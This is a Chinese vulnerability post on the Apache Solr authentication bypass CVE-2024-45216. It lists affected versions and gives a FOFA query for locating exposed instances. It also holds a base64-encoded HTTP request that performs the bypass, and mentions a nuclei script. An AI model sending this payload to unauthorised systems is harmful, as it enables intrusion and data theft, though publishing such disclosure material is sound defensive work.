Apache Solr身份验证绕过漏洞CVE-2024-45216(附nuclei脚本)

admin 2024年11月1日17:48:35评论15 views字数 847阅读2分49秒阅读模式
Apache Solr身份验证绕过漏洞CVE-2024-45216(附nuclei脚本)
喜欢就关注我吧,订阅更多最新消息
漏洞概述
Apache Solr是一个开源搜索服务器,使用Java语言开发,主要基于HTTP和Apache Lucene实现。
2024年10月16日,启明星辰集团VSRC监测到Apache Solr发布安全公告,修复了Solr中的一个身份验证绕过漏洞(CVE-2024-45216),官方评级为“严重”。
Apache Solr实例使用PKIAuthenticationPlugin(该插件在使用Solr身份验证时默认启用)时存在身份验证绕过漏洞,攻击者可针对任何Solr API URL构造恶意路径来绕过Solr的认证机制,从而可能访问敏感数据或执行未授权操作。

Apache Solr身份验证绕过漏洞CVE-2024-45216(附nuclei脚本)

影响范围
5.3.0 <= Apache Solr < 8.11.4
9.0.0 <= Apache Solr < 9.7.0
搜索语法

FOFA: app="APACHE-Solr"

漏洞复现

通过在URL末尾使用":/admin/info/key",可以绕过PKIAuthenticationPlugin,以便未经授权的用户可以访问受保护的API。

请求包:

R0VUIC9zb2xyL2FkbWluL2luZm8vcHJvcGVydGllczovYWRtaW4vaW5mby9rZXkgSFRUUC8xLjEKSG9zdDogMTI3LjAuMC4xClNvbHJBdXRoOiBYWFhYWA==

最近文章老被举报,以后就不露请求包和脚本了,这个解码一下

地址:http://www.hiencode.com/base64.html

Apache Solr身份验证绕过漏洞CVE-2024-45216(附nuclei脚本)

Nuclei脚本下载

后台回复 CVE-2024-45216 下载

注:本文中提到的漏洞验证 poc 或工具仅用于授权测试,任何未经授权的测试均属于非法行为。任何人不得利用本文中的技术手段或工具进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

Apache Solr身份验证绕过漏洞CVE-2024-45216(附nuclei脚本)
喜欢就关注我吧,订阅更多最新消息

原文始发于微信公众号(扫地僧的茶饭日常):Apache Solr身份验证绕过漏洞CVE-2024-45216(附nuclei脚本)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日17:48:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Solr身份验证绕过漏洞CVE-2024-45216(附nuclei脚本)https://cn-sec.com/archives/3343765.html

发表评论

匿名网友 填写信息